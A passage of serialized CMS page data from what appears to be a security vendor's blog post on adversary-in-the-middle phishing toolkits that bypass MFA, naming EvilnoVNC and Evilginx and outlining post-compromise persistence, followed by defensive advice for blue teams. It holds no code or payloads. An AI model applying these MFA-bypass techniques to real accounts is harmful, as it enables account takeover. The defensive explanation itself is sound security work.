demo – chaining it all together",[],{},{"nodeType":178,"data":230196,"content":230197},{},[230198],{"nodeType":173,"value":230199,"marks":230200,"data":230201},"OK, so we’ve just jumped from an account compromise for initial access using an AitM phishing attack to bringing up a huge number of other connected techniques. Let’s look at a quick video demonstration of an AitM phishing attack chained together with post-exploitation steps for persistence and lateral movement so we can see how it all fits together.",[],{},{"nodeType":178,"data":230203,"content":230204},{},[230205],{"nodeType":173,"value":230206,"marks":230207,"data":230208},"In this case, we’ll use EvilnoVNC targeting Okta as the core example for the AitM phishing attack:",[],{},{"nodeType":312,"data":230210,"content":230214},{"target":230211},{"sys":230212},{"id":230213,"type":317,"linkType":318},"QGTEWzmOL1vrgjXPuV4Gg",[],{"nodeType":178,"data":230216,"content":230217},{},[230218],{"nodeType":173,"value":230219,"marks":230220,"data":230221},"We can see here that AitM phishing attacks are not only highly effective even in the presence of MFA, but that post-exploitation steps have become so numerous that effective response and containment for even a low-privileged user account are now a significant challenge.",[],{},{"nodeType":169,"data":230223,"content":230224},{},[230225],{"nodeType":173,"value":230226,"marks":230227,"data":230228},"Post-exploitation automation is coming",[],{},{"nodeType":178,"data":230230,"content":230231},{},[230232],{"nodeType":173,"value":230233,"marks":230234,"data":230235},"There is a saying that attacks only become more effective over time. In the past, toolsets like Metasploit and Cobalt Strike became increasingly focused on post-exploitation and automation to enable much more sophisticated compromises.",[],{},{"nodeType":178,"data":230237,"content":230238},{},[230239,230243,230254,230258,230263],{"nodeType":173,"value":230240,"marks":230241,"data":230242},"As AitM becomes increasingly popular (for example, researchers at Lab539 have reported ",[],{},{"nodeType":186,"data":230244,"content":230245},{"uri":183364},[230246,230251],{"nodeType":173,"value":230247,"marks":230248,"data":230250},"a significant ramp up in attacker infrastructure linked to AitM campaigns",[230249],{"type":194},{},{"nodeType":173,"value":1260,"marks":230252,"data":230253},[],{},{"nodeType":173,"value":230255,"marks":230256,"data":230257}," it’s only a matter of time now before we see AitM phishing frameworks moving in the same direction and performing many of the lateral movement and persistence steps we saw above – automatically on every successful account compromise. The threat will increase ",[],{},{"nodeType":173,"value":230259,"marks":230260,"data":230262},"significantly",[230261],{"type":370},{},{"nodeType":173,"value":230264,"marks":230265,"data":230266}," when this becomes the case.",[],{},{"nodeType":169,"data":230268,"content":230269},{},[230270],{"nodeType":173,"value":143524,"marks":230271,"data":230272},[],{},{"nodeType":178,"data":230274,"content":230275},{},[230276],{"nodeType":173,"value":230277,"marks":230278,"data":230279},"We’ve covered a lot of ground here, so let’s take a step back and consider the key points of impact:",[],{},{"nodeType":250,"data":230281,"content":230282},{},[230283,230293,230303],{"nodeType":254,"data":230284,"content":230285},{},[230286],{"nodeType":178,"data":230287,"content":230288},{},[230289],{"nodeType":173,"value":230290,"marks":230291,"data":230292},"AitM phishing techniques are highly effective and increasingly common, and can bypass most common forms of MFA.",[],{},{"nodeType":254,"data":230294,"content":230295},{},[230296],{"nodeType":178,"data":230297,"content":230298},{},[230299],{"nodeType":173,"value":230300,"marks":230301,"data":230302},"These techniques are being used by real threat actors and red teamers alike, with both criminal and open-source tools available for performing these attacks.",[],{},{"nodeType":254,"data":230304,"content":230305},{},[230306],{"nodeType":178,"data":230307,"content":230308},{},[230309],{"nodeType":173,"value":230310,"marks":230311,"data":230312},"There are many options for lateral movement and persistence after an account compromise, so simple containment actions like password resets for SSO credentials are not nearly enough to contain a knowledgeable attacker.",[],{},{"nodeType":169,"data":230314,"content":230315},{},[230316],{"nodeType":173,"value":230317,"marks":230318,"data":230319},"What can blue teams do about it?",[],{},{"nodeType":178,"data":230321,"content":230322},{},[230323],{"nodeType":173,"value":230324,"marks":230325,"data":230326},"It’s important that organizations develop their capability to detect and respond to AitM attacks. Possible approaches include:",[],{},{"nodeType":250,"data":230328,"content":230329},{},[230330,230345,230380,230408],{"nodeType":254,"data":230331,"content":230332},{},[230333],{"nodeType":178,"data":230334,"content":230335},{},[230336,230341],{"nodeType":173,"value":230337,"marks":230338,"data":230340},"Move to FIDO MFA where possible",[230339],{"type":370},{},{"nodeType":173,"value":230342,"marks":230343,"data":230344}," (though, if no more susceptible backup methods are enabled, this does introduce operational challenges if passkeys are lost).",[],{},{"nodeType":254,"data":230346,"content":230347},{},[230348],{"nodeType":178,"data":230349,"content":230350},{},[230351,230356,230359,230364,230368,230377],{"nodeType":173,"value":230352,"marks":230353,"data":230355},"Detect and block known-bad malicious",[230354],{"type":370},{},{"nodeType":173,"value":3107,"marks":230357,"data":230358},[],{},{"nodeType":173,"value":230360,"marks":230361,"data":230363},"sites",[230362],{"type":370},{},{"nodeType":173,"value":230365,"marks":230366,"data":230367}," used in phishing campaigns. There are many threat intelligence feeds that can be ingested to achieve this. Usually, a domain has to be used in a malicious campaign before it can be catalogued – meaning there's typically a window of opportunity before the infrastructure is burned. That said, security researchers at Lab539 (yes, another shout out) have developed a way of identifying sites running AitM tooling – even before they are used for the first time. ",[],{},{"nodeType":186,"data":230369,"content":230371},{"uri":230370},"https://www.lab539.com/aitm",[230372],{"nodeType":173,"value":230373,"marks":230374,"data":230376},"You can sign up to get access to their feed here.",[230375],{"type":194},{},{"nodeType":173,"value":37,"marks":230378,"data":230379},[],{},{"nodeType":254,"data":230381,"content":230382},{},[230383],{"nodeType":178,"data":230384,"content":230385},{},[230386,230391,230395,230404],{"nodeType":173,"value":230387,"marks":230388,"data":230390},"Introduce controls to detect phishing toolkits and cloned websites",[230389],{"type":370},{},{"nodeType":173,"value":230392,"marks":230393,"data":230394},". You can never rely on blocking malicious sites via TI feeds alone, so additional layers of defence are required. Push customers benefit from detection of AitM toolkits like Evilginx and EvilNoVNC in the browser (more to come on this soon!), while Thinkst Canary has developed ",[],{},{"nodeType":186,"data":230396,"content":230398},{"uri":230397},"https://blog.thinkst.com/2024/01/defending-against-the-attack-of-the-cloned-websites.html",[230399],{"nodeType":173,"value":230400,"marks":230401,"data":230403},"methods of detecting whenever your website or login portal is cloned",[230402],{"type":194},{},{"nodeType":173,"value":230405,"marks":230406,"data":230407}," – very cool.  ",[],{},{"nodeType":254,"data":230409,"content":230410},{},[230411],{"nodeType":178,"data":230412,"content":230413},{},[230414,230419],{"nodeType":173,"value":230415,"marks":230416,"data":230418},"Update IR playbooks to to deal with SSO account compromise,",[230417],{"type":370},{},{"nodeType":173,"value":230420,"marks":230421,"data":230422}," factoring in lateral movement and persistence across cloud apps. This really necessitates that you understand what business apps your organization is using, how they are accessed (e.g. SSO or username and password) and what functionality exists that could be abused by an attacker. ",[],{},{"nodeType":178,"data":230424,"content":230425},{},[230426,230430,230437],{"nodeType":173,"value":230427,"marks":230428,"data":230429},"If you want to know more about how Push detects and blocks phishing tools in the browser, you can ",[],{},{"nodeType":186,"data":230431,"content":230432},{"uri":75048},[230433],{"nodeType":173,"value":230434,"marks":230435,"data":230436},"check out our article here",[],{},{"nodeType":173,"value":2340,"marks":230438,"data":230439},[],{},{"nodeType":169,"data":230441,"content":230442},{},[230443],{"nodeType":173,"value":40632,"marks":230444,"data":230445},[],{},{"nodeType":178,"data":230447,"content":230448},{},[230449],{"nodeType":173,"value":230450,"marks":230451,"data":230452},"We’ve seen in this article how there are multiple ways to perform AitM phishing attacks and how they can be extremely effective at targeting users even when their accounts are protected by MFA.  ",[],{},{"nodeType":178,"data":230454,"content":230455},{},[230456],{"nodeType":173,"value":230457,"marks":230458,"data":230459},"Very few organizations are universally using phishing-resistant MFA, such as FIDO-based methods, and even those that do often have fallback options to handle situations where they cannot be used and/or tokens malfunction or are lost. Therefore, the vast majority of organizations are at risk of AitM phishing attacks.",[],{},{"nodeType":178,"data":230461,"content":230462},{},[230463],{"nodeType":173,"value":230464,"marks":230465,"data":230466},"To make things worse, there are lateral movement and persistence techniques that can be exploited to greatly extend the depth of compromise even for a single low-privilege user account. This makes response and containment a significant challenge.",[],{},{"nodeType":178,"data":230468,"content":230469},{},[230470,230474,230481,230484,230492,230496,230504,230508,230516],{"nodeType":173,"value":230471,"marks":230472,"data":230473},"Phishing attacks are clearly evolving. Phishing attacks are no longer limited to email-based delivery mechanisms or being hosted on custom domains. There are many options now for delivering phishing attacks using ",[],{},{"nodeType":186,"data":230475,"content":230476},{"uri":181526},[230477],{"nodeType":173,"value":226380,"marks":230478,"data":230480},[230479],{"type":194},{},{"nodeType":173,"value":1464,"marks":230482,"data":230483},[],{},{"nodeType":186,"data":230485,"content":230486},{"uri":181538},[230487],{"nodeType":173,"value":230488,"marks":230489,"data":230491},"Microsoft Teams",[230490],{"type":194},{},{"nodeType":173,"value":230493,"marks":230494,"data":230495},", using ",[],{},{"nodeType":186,"data":230497,"content":230498},{"uri":70029},[230499],{"nodeType":173,"value":230500,"marks":230501,"data":230503},"SAMLjacking attacks",[230502],{"type":194},{},{"nodeType":173,"value":230505,"marks":230506,"data":230507}," to host the initial landing page on legitimate SaaS web domains or even using ",[],{},{"nodeType":186,"data":230509,"content":230510},{"uri":162243},[230511],{"nodeType":173,"value":230512,"marks":230513,"data":230515},"Okta to keylog credentials",[230514],{"type":194},{},{"nodeType":173,"value":230517,"marks":230518,"data":230519}," on behalf of the attacker. ",[],{},{"nodeType":178,"data":230521,"content":230522},{},[230523],{"nodeType":173,"value":230524,"marks":230525,"data":230526},"Increasingly, we should expect to see AitM toolkits being used as a standard part of phishing campaigns, and featured in Initial Access Broker tooling – AitM will effectively supersede legacy phishing methods in line with MFA adoption. Rather, it already is. ",[],{},{"nodeType":231,"data":230528,"content":230529},{},[],{"nodeType":178,"data":230531,"content":230532},{},[230533],{"nodeType":173,"value":230534,"marks":230535,"data":230536},"If you're interested in seeing some more AitM tools in action, you can watch our recent webinar on-demand via the link below. ",[],{},{"nodeType":312,"data":230538,"content":230541},{"target":230539},{"sys":230540},{"id":229805,"type":317,"linkType":318},[],{"nodeType":178,"data":230543,"content":230544},{},[230545],{"nodeType":173,"value":37,"marks":230546,"data":230547},[],{},"Attackers are using Adversary in the Middle (AitM) phishing toolkits to bypass MFA. We look at what AitM is, how it works, and what you can do about it.","2024-05-23T00:00:00.000Z","phishing-2-0-how-phishing-toolkits-are-evolving-with-aitm",{"items":230552},[230553,230555],{"sys":230554,"name":505},{"id":504},{"sys":230556,"name":509},{"id":508},{"items":230558},[230559],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":230560},{"url":8615},{"__typename":1528,"sys":230562,"content":230563,"title":217833,"synopsis":217834,"hashTags":118,"publishedDate":217835,"slug":217836,"tagsCollection":230973,"authorsCollection":230979},{"id":217358},{"json":230564},{"nodeType":165,"data":230565,"content":230566},{},[230567,230573,230579,230585,230591,230597,230603,230609,230615,230621,230637,230653,230659,230665,230681,230687,230697,230734,230740,230756,230763,230769,230775,230781,230787,230793,230851,230857,230862,230868,230874,230880,230886,230902,230908,230914,230920,230926,230932,230938,230944,230950,230956,230961,230967],{"nodeType":178,"data":230568,"content":230569},{},[230570],{"nodeType":173,"value":217367,"marks":230571,"data":230572},[],{},{"nodeType":178,"data":230574,"content":230575},{},[230576],{"nodeType":173,"value":217374,"marks":230577,"data":230578},[],{},{"nodeType":178,"data":230580,"content":230581},{},[230582],{"nodeType":173,"value":217381,"marks":230583,"data":230584},[],{},{"nodeType":178,"data":230586,"content":230587},{},[230588],{"nodeType":173,"value":217388,"marks":230589,"data":230590},[],{},{"nodeType":178,"data":230592,"content":230593},{},[230594],{"nodeType":173,"value":217395,"marks":230595,"data":230596},[],{},{"nodeType":169,"data":230598,"content":230599},{},[230600],{"nodeType":173,"value":217402,"marks":230601,"data":230602},[],{},{"nodeType":178,"data":230604,"content":230605},{},[230606],{"nodeType":173,"value":217409,"marks":230607,"data":230608},[],{},{"nodeType":178,"data":230610,"content":230611},{},[230612],{"nodeType":173,"value":217416,"marks":230613,"data":230614},[],{},{"nodeType":178,"data":230616,"content":230617},{},[230618],{"nodeType":173,"value":217423,"marks":230619,"data":230620},[],{},{"nodeType":250,"data":230622,"content":230623},{},[230624],{"nodeType":254,"data":230625,"content":230626},{},[230627],{"nodeType":178,"data":230628,"content":230629},{},[230630,230634],{"nodeType":173,"value":217436,"marks":230631,"data":230633},[230632],{"type":370},{},{"nodeType":173,"value":217441,"marks":230635,"data":230636},[],{},{"nodeType":250,"data":230638,"content":230639},{},[230640],{"nodeType":254,"data":230641,"content":230642},{},[230643],{"nodeType":178,"data":230644,"content":230645},{},[230646,230650],{"nodeType":173,"value":217454,"marks":230647,"data":230649},[230648],{"type":370},{},{"nodeType":173,"value":217459,"marks":230651,"data":230652},[],{},{"nodeType":235,"data":230654,"content":230655},{},[230656],{"nodeType":173,"value":217466,"marks":230657,"data":230658},[],{},{"nodeType":178,"data":230660,"content":230661},{},[230662],{"nodeType":173,"value":217473,"marks":230663,"data":230664},[],{},{"nodeType":178,"data":230666,"content":230667},{},[230668,230671,230678],{"nodeType":173,"value":217480,"marks":230669,"data":230670},[],{},{"nodeType":186,"data":230672,"content":230673},{"uri":217485},[230674],{"nodeType":173,"value":217488,"marks":230675,"data":230677},[230676],{"type":194},{},{"nodeType":173,"value":217493,"marks":230679,"data":230680},[],{},{"nodeType":178,"data":230682,"content":230683},{},[230684],{"nodeType":173,"value":217500,"marks":230685,"data":230686},[],{},{"nodeType":178,"data":230688,"content":230689},{},[230690,230693],{"nodeType":173,"value":217507,"marks":230691,"data":230692},[],{},{"nodeType":173,"value":217511,"marks":230694,"data":230696},[230695],{"type":370},{},{"nodeType":250,"data":230698,"content":230699},{},[230700,230717],{"nodeType":254,"data":230701,"content":230702},{},[230703],{"nodeType":178,"data":230704,"content":230705},{},[230706,230710,230713],{"nodeType":173,"value":217525,"marks":230707,"data":230709},[230708],{"type":370},{},{"nodeType":173,"value":217530,"marks":230711,"data":230712},[],{},{"nodeType":173,"value":217534,"marks":230714,"data":230716},[230715],{"type":1646},{},{"nodeType":254,"data":230718,"content":230719},{},[230720],{"nodeType":178,"data":230721,"content":230722},{},[230723,230727,230730],{"nodeType":173,"value":217545,"marks":230724,"data":230726},[230725],{"type":370},{},{"nodeType":173,"value":217550,"marks":230728,"data":230729},[],{},{"nodeType":173,"value":217554,"marks":230731,"data":230733},[230732],{"type":370},{},{"nodeType":178,"data":230735,"content":230736},{},[230737],{"nodeType":173,"value":217562,"marks":230738,"data":230739},[],{},{"nodeType":178,"data":230741,"content":230742},{},[230743,230747,230752],{"nodeType":173,"value":217569,"marks":230744,"data":230746},[230745],{"type":370},{},{"nodeType":173,"value":217574,"marks":230748,"data":230751},[230749,230750],{"type":1646},{"type":370},{},{"nodeType":173,"value":217580,"marks":230753,"data":230755},[230754],{"type":370},{},{"nodeType":169,"data":230757,"content":230758},{},[230759],{"nodeType":173,"value":217588,"marks":230760,"data":230762},[230761],{"type":370},{},{"nodeType":178,"data":230764,"content":230765},{},[230766],{"nodeType":173,"value":217596,"marks":230767,"data":230768},[],{},{"nodeType":178,"data":230770,"content":230771},{},[230772],{"nodeType":173,"value":217603,"marks":230773,"data":230774},[],{},{"nodeType":178,"data":230776,"content":230777},{},[230778],{"nodeType":173,"value":217610,"marks":230779,"data":230780},[],{},{"nodeType":178,"data":230782,"content":230783},{},[230784],{"nodeType":173,"value":217617,"marks":230785,"data":230786},[],{},{"nodeType":178,"data":230788,"content":230789},{},[230790],{"nodeType":173,"value":217624,"marks":230791,"data":230792},[],{},{"nodeType":250,"data":230794,"content":230795},{},[230796,230815,230833],{"nodeType":254,"data":230797,"content":230798},{},[230799],{"nodeType":178,"data":230800,"content":230801},{},[230802,230805,230812],{"nodeType":173,"value":37,"marks":230803,"data":230804},[],{},{"nodeType":186,"data":230806,"content":230807},{"uri":9099},[230808],{"nodeType":173,"value":217643,"marks":230809,"data":230811},[230810],{"type":194},{},{"nodeType":173,"value":217648,"marks":230813,"data":230814},[],{},{"nodeType":254,"data":230816,"content":230817},{},[230818],{"nodeType":178,"data":230819,"content":230820},{},[230821,230824,230830],{"nodeType":173,"value":37,"marks":230822,"data":230823},[],{},{"nodeType":186,"data":230825,"content":230826},{"uri":75048},[230827],{"nodeType":173,"value":217664,"marks":230828,"data":230829},[],{},{"nodeType":173,"value":217668,"marks":230831,"data":230832},[],{},{"nodeType":254,"data":230834,"content":230835},{},[230836],{"nodeType":178,"data":230837,"content":230838},{},[230839,230842,230848],{"nodeType":173,"value":37,"marks":230840,"data":230841},[],{},{"nodeType":186,"data":230843,"content":230844},{"uri":217682},[230845],{"nodeType":173,"value":217685,"marks":230846,"data":230847},[],{},{"nodeType":173,"value":217689,"marks":230849,"data":230850},[],{},{"nodeType":178,"data":230852,"content":230853},{},[230854],{"nodeType":173,"value":217696,"marks":230855,"data":230856},[],{},{"nodeType":312,"data":230858,"content":230861},{"target":230859},{"sys":230860},{"id":75120,"type":317,"linkType":318},[],{"nodeType":178,"data":230863,"content":230864},{},[230865],{"nodeType":173,"value":217708,"marks":230866,"data":230867},[],{},{"nodeType":169,"data":230869,"content":230870},{},[230871],{"nodeType":173,"value":217715,"marks":230872,"data":230873},[],{},{"nodeType":178,"data":230875,"content":230876},{},[230877],{"nodeType":173,"value":217722,"marks":230878,"data":230879},[],{},{"nodeType":235,"data":230881,"content":230882},{},[230883],{"nodeType":173,"value":217729,"marks":230884,"data":230885},[],{},{"nodeType":178,"data":230887,"content":230888},{},[230889,230892,230899],{"nodeType":173,"value":217736,"marks":230890,"data":230891},[],{},{"nodeType":186,"data":230893,"content":230894},{"uri":115077},[230895],{"nodeType":173,"value":217743,"marks":230896,"data":230898},[230897],{"type":194},{},{"nodeType":173,"value":217748,"marks":230900,"data":230901},[],{},{"nodeType":178,"data":230903,"content":230904},{},[230905],{"nodeType":173,"value":217755,"marks":230906,"data":230907},[],{},{"nodeType":178,"data":230909,"content":230910},{},[230911],{"nodeType":173,"value":217762,"marks":230912,"data":230913},[],{},{"nodeType":178,"data":230915,"content":230916},{},[230917],{"nodeType":173,"value":217769,"marks":230918,"data":230919},[],{},{"nodeType":235,"data":230921,"content":230922},{},[230923],{"nodeType":173,"value":217776,"marks":230924,"data":230925},[],{},{"nodeType":178,"data":230927,"content":230928},{},[230929],{"nodeType":173,"value":217783,"marks":230930,"data":230931},[],{},{"nodeType":178,"data":230933,"content":230934},{},[230935],{"nodeType":173,"value":217790,"marks":230936,"data":230937},[],{},{"nodeType":235,"data":230939,"content":230940},{},[230941],{"nodeType":173,"value":217797,"marks":230942,"data":230943},[],{},{"nodeType":178,"data":230945,"content":230946},{},[230947],{"nodeType":173,"value":217804,"marks":230948,"data":230949},[],{},{"nodeType":178,"data":230951,"content":230952},{},[230953],{"nodeType":173,"value":217811,"marks":230954,"data":230955},[],{},{"nodeType":312,"data":230957,"content":230960},{"target":230958},{"sys":230959},{"id":217818,"type":317,"linkType":318},[],{"nodeType":169,"data":230962,"content":230963},{},[230964],{"nodeType":173,"value":40632,"marks":230965,"data":230966},[],{},{"nodeType":178,"data":230968,"content":230969},{},[230970],{"nodeType":173,"value":217830,"marks":230971,"data":230972},[],{},{"items":230974},[230975,230977],{"sys":230976,"name":509},{"id":508},{"sys":230978,"name":505},{"id":504},{"items":230980},[230981],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":230982},{"url":1496},{"items":230984},[230985],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":230986},{"url":2911},{"json":230988,"links":231664},{"nodeType":165,"data":230989,"content":230990},{},[230991,230996,231002,231044,231050,231056,231069,231075,231081,231150,231156,231161,231167,231173,231186,231192,231198,231218,231238,231243,231260,231266,231272,231299,231305,231311,231316,231333,231339,231345,231351,231357,231362,231379,231385,231391,231397,231403,231408,231425,231431,231437,231442,231459,231465,231471,231477,231519,231525,231586,231599,231604,231610,231616,231622,231628,231643,231649],{"nodeType":312,"data":230992,"content":230995},{"target":230993},{"sys":230994},{"id":183314,"type":317,"linkType":318},[],{"nodeType":178,"data":230997,"content":230998},{},[230999],{"nodeType":173,"value":183320,"marks":231000,"data":231001},[],{},{"nodeType":178,"data":231003,"content":231004},{},[231005,231008,231014,231017,231023,231026,231032,231035,231041],{"nodeType":173,"value":183327,"marks":231006,"data":231007},[],{},{"nodeType":186,"data":231009,"content":231010},{"uri":183332},[231011],{"nodeType":173,"value":183335,"marks":231012,"data":231013},[],{},{"nodeType":173,"value":3107,"marks":231015,"data":231016},[],{},{"nodeType":186,"data":231018,"content":231019},{"uri":183343},[231020],{"nodeType":173,"value":183346,"marks":231021,"data":231022},[],{},{"nodeType":173,"value":3107,"marks":231024,"data":231025},[],{},{"nodeType":186,"data":231027,"content":231028},{"uri":1297},[231029],{"nodeType":173,"value":183356,"marks":231030,"data":231031},[],{},{"nodeType":173,"value":3107,"marks":231033,"data":231034},[],{},{"nodeType":186,"data":231036,"content":231037},{"uri":183364},[231038],{"nodeType":173,"value":183367,"marks":231039,"data":231040},[],{},{"nodeType":173,"value":183371,"marks":231042,"data":231043},[],{},{"nodeType":178,"data":231045,"content":231046},{},[231047],{"nodeType":173,"value":183378,"marks":231048,"data":231049},[],{},{"nodeType":178,"data":231051,"content":231052},{},[231053],{"nodeType":173,"value":183385,"marks":231054,"data":231055},[],{},{"nodeType":178,"data":231057,"content":231058},{},[231059,231062,231066],{"nodeType":173,"value":183392,"marks":231060,"data":231061},[],{},{"nodeType":173,"value":183396,"marks":231063,"data":231065},[231064],{"type":370},{},{"nodeType":173,"value":1477,"marks":231067,"data":231068},[],{},{"nodeType":178,"data":231070,"content":231071},{},[231072],{"nodeType":173,"value":183407,"marks":231073,"data":231074},[],{},{"nodeType":178,"data":231076,"content":231077},{},[231078],{"nodeType":173,"value":183414,"marks":231079,"data":231080},[],{},{"nodeType":250,"data":231082,"content":231083},{},[231084,231109],{"nodeType":254,"data":231085,"content":231086},{},[231087],{"nodeType":178,"data":231088,"content":231089},{},[231090,231094,231097,231106],{"nodeType":173,"value":183427,"marks":231091,"data":231093},[231092],{"type":370},{},{"nodeType":173,"value":183432,"marks":231095,"data":231096},[],{},{"nodeType":1698,"data":231098,"content":231101},{"target":231099},{"sys":231100},{"id":183439,"type":317,"linkType":318},[231102],{"nodeType":173,"value":18649,"marks":231103,"data":231105},[231104],{"type":370},{},{"nodeType":173,"value":183446,"marks":231107,"data":231108},[],{},{"nodeType":254,"data":231110,"content":231111},{},[231112],{"nodeType":178,"data":231113,"content":231114},{},[231115,231119,231122,231128,231131,231137,231140,231147],{"nodeType":173,"value":183456,"marks":231116,"data":231118},[231117],{"type":370},{},{"nodeType":173,"value":183461,"marks":231120,"data":231121},[],{},{"nodeType":186,"data":231123,"content":231124},{"uri":183466},[231125],{"nodeType":173,"value":183469,"marks":231126,"data":231127},[],{},{"nodeType":173,"value":2936,"marks":231129,"data":231130},[],{},{"nodeType":186,"data":231132,"content":231133},{"uri":114007},[231134],{"nodeType":173,"value":183479,"marks":231135,"data":231136},[],{},{"nodeType":173,"value":183483,"marks":231138,"data":231139},[],{},{"nodeType":186,"data":231141,"content":231142},{"uri":183488},[231143],{"nodeType":173,"value":2718,"marks":231144,"data":231146},[231145],{"type":370},{},{"nodeType":173,"value":183495,"marks":231148,"data":231149},[],{},{"nodeType":178,"data":231151,"content":231152},{},[231153],{"nodeType":173,"value":183502,"marks":231154,"data":231155},[],{},{"nodeType":312,"data":231157,"content":231160},{"target":231158},{"sys":231159},{"id":169040,"type":317,"linkType":318},[],{"nodeType":169,"data":231162,"content":231163},{},[231164],{"nodeType":173,"value":183514,"marks":231165,"data":231166},[],{},{"nodeType":178,"data":231168,"content":231169},{},[231170],{"nodeType":173,"value":183521,"marks":231171,"data":231172},[],{},{"nodeType":178,"data":231174,"content":231175},{},[231176,231179,231183],{"nodeType":173,"value":183528,"marks":231177,"data":231178},[],{},{"nodeType":173,"value":18649,"marks":231180,"data":231182},[231181],{"type":370},{},{"nodeType":173,"value":183536,"marks":231184,"data":231185},[],{},{"nodeType":178,"data":231187,"content":231188},{},[231189],{"nodeType":173,"value":183543,"marks":231190,"data":231191},[],{},{"nodeType":235,"data":231193,"content":231194},{},[231195],{"nodeType":173,"value":24345,"marks":231196,"data":231197},[],{},{"nodeType":178,"data":231199,"content":231200},{},[231201,231204,231208,231211,231215],{"nodeType":173,"value":183556,"marks":231202,"data":231203},[],{},{"nodeType":173,"value":183560,"marks":231205,"data":231207},[231206],{"type":370},{},{"nodeType":173,"value":933,"marks":231209,"data":231210},[],{},{"nodeType":173,"value":183568,"marks":231212,"data":231214},[231213],{"type":370},{},{"nodeType":173,"value":1477,"marks":231216,"data":231217},[],{},{"nodeType":178,"data":231219,"content":231220},{},[231221,231224,231228,231231,231235],{"nodeType":173,"value":183579,"marks":231222,"data":231223},[],{},{"nodeType":173,"value":2740,"marks":231225,"data":231227},[231226],{"type":370},{},{"nodeType":173,"value":1464,"marks":231229,"data":231230},[],{},{"nodeType":173,"value":2748,"marks":231232,"data":231234},[231233],{"type":370},{},{"nodeType":173,"value":183594,"marks":231236,"data":231237},[],{},{"nodeType":312,"data":231239,"content":231242},{"target":231240},{"sys":231241},{"id":156217,"type":317,"linkType":318},[],{"nodeType":178,"data":231244,"content":231245},{},[231246,231249,231257],{"nodeType":173,"value":183606,"marks":231247,"data":231248},[],{},{"nodeType":1698,"data":231250,"content":231253},{"target":231251},{"sys":231252},{"id":2148,"type":317,"linkType":318},[231254],{"nodeType":173,"value":65996,"marks":231255,"data":231256},[],{},{"nodeType":173,"value":37,"marks":231258,"data":231259},[],{},{"nodeType":235,"data":231261,"content":231262},{},[231263],{"nodeType":173,"value":125683,"marks":231264,"data":231265},[],{},{"nodeType":178,"data":231267,"content":231268},{},[231269],{"nodeType":173,"value":183630,"marks":231270,"data":231271},[],{},{"nodeType":178,"data":231273,"content":231274},{},[231275,231278,231282,231285,231289,231292,231296],{"nodeType":173,"value":183637,"marks":231276,"data":231277},[],{},{"nodeType":173,"value":2740,"marks":231279,"data":231281},[231280],{"type":370},{},{"nodeType":173,"value":1464,"marks":231283,"data":231284},[],{},{"nodeType":173,"value":2748,"marks":231286,"data":231288},[231287],{"type":370},{},{"nodeType":173,"value":183652,"marks":231290,"data":231291},[],{},{"nodeType":173,"value":2701,"marks":231293,"data":231295},[231294],{"type":370},{},{"nodeType":173,"value":183660,"marks":231297,"data":231298},[],{},{"nodeType":178,"data":231300,"content":231301},{},[231302],{"nodeType":173,"value":183667,"marks":231303,"data":231304},[],{},{"nodeType":178,"data":231306,"content":231307},{},[231308],{"nodeType":173,"value":183674,"marks":231309,"data":231310},[],{},{"nodeType":312,"data":231312,"content":231315},{"target":231313},{"sys":231314},{"id":183681,"type":317,"linkType":318},[],{"nodeType":178,"data":231317,"content":231318},{},[231319,231322,231330],{"nodeType":173,"value":183606,"marks":231320,"data":231321},[],{},{"nodeType":1698,"data":231323,"content":231326},{"target":231324},{"sys":231325},{"id":2405,"type":317,"linkType":318},[231327],{"nodeType":173,"value":125683,"marks":231328,"data":231329},[],{},{"nodeType":173,"value":37,"marks":231331,"data":231332},[],{},{"nodeType":235,"data":231334,"content":231335},{},[231336],{"nodeType":173,"value":157048,"marks":231337,"data":231338},[],{},{"nodeType":178,"data":231340,"content":231341},{},[231342],{"nodeType":173,"value":183710,"marks":231343,"data":231344},[],{},{"nodeType":178,"data":231346,"content":231347},{},[231348],{"nodeType":173,"value":183717,"marks":231349,"data":231350},[],{},{"nodeType":178,"data":231352,"content":231353},{},[231354],{"nodeType":173,"value":183724,"marks":231355,"data":231356},[],{},{"nodeType":312,"data":231358,"content":231361},{"target":231359},{"sys":231360},{"id":183731,"type":317,"linkType":318},[],{"nodeType":178,"data":231363,"content":231364},{},[231365,231368,231376],{"nodeType":173,"value":183606,"marks":231366,"data":231367},[],{},{"nodeType":1698,"data":231369,"content":231372},{"target":231370},{"sys":231371},{"id":183743,"type":317,"linkType":318},[231373],{"nodeType":173,"value":157048,"marks":231374,"data":231375},[],{},{"nodeType":173,"value":37,"marks":231377,"data":231378},[],{},{"nodeType":235,"data":231380,"content":231381},{},[231382],{"nodeType":173,"value":183755,"marks":231383,"data":231384},[],{},{"nodeType":178,"data":231386,"content":231387},{},[231388],{"nodeType":173,"value":183762,"marks":231389,"data":231390},[],{},{"nodeType":178,"data":231392,"content":231393},{},[231394],{"nodeType":173,"value":183769,"marks":231395,"data":231396},[],{},{"nodeType":178,"data":231398,"content":231399},{},[231400],{"nodeType":173,"value":183776,"marks":231401,"data":231402},[],{},{"nodeType":312,"data":231404,"content":231407},{"target":231405},{"sys":231406},{"id":183783,"type":317,"linkType":318},[],{"nodeType":178,"data":231409,"content":231410},{},[231411,231414,231422],{"nodeType":173,"value":183606,"marks":231412,"data":231413},[],{},{"nodeType":1698,"data":231415,"content":231418},{"target":231416},{"sys":231417},{"id":114256,"type":317,"linkType":318},[231419],{"nodeType":173,"value":114259,"marks":231420,"data":231421},[],{},{"nodeType":173,"value":37,"marks":231423,"data":231424},[],{},{"nodeType":235,"data":231426,"content":231427},{},[231428],{"nodeType":173,"value":2631,"marks":231429,"data":231430},[],{},{"nodeType":178,"data":231432,"content":231433},{},[231434],{"nodeType":173,"value":183812,"marks":231435,"data":231436},[],{},{"nodeType":312,"data":231438,"content":231441},{"target":231439},{"sys":231440},{"id":183819,"type":317,"linkType":318},[],{"nodeType":178,"data":231443,"content":231444},{},[231445,231448,231456],{"nodeType":173,"value":183606,"marks":231446,"data":231447},[],{},{"nodeType":1698,"data":231449,"content":231452},{"target":231450},{"sys":231451},{"id":2466,"type":317,"linkType":318},[231453],{"nodeType":173,"value":126474,"marks":231454,"data":231455},[],{},{"nodeType":173,"value":37,"marks":231457,"data":231458},[],{},{"nodeType":169,"data":231460,"content":231461},{},[231462],{"nodeType":173,"value":183842,"marks":231463,"data":231464},[],{},{"nodeType":178,"data":231466,"content":231467},{},[231468],{"nodeType":173,"value":183849,"marks":231469,"data":231470},[],{},{"nodeType":178,"data":231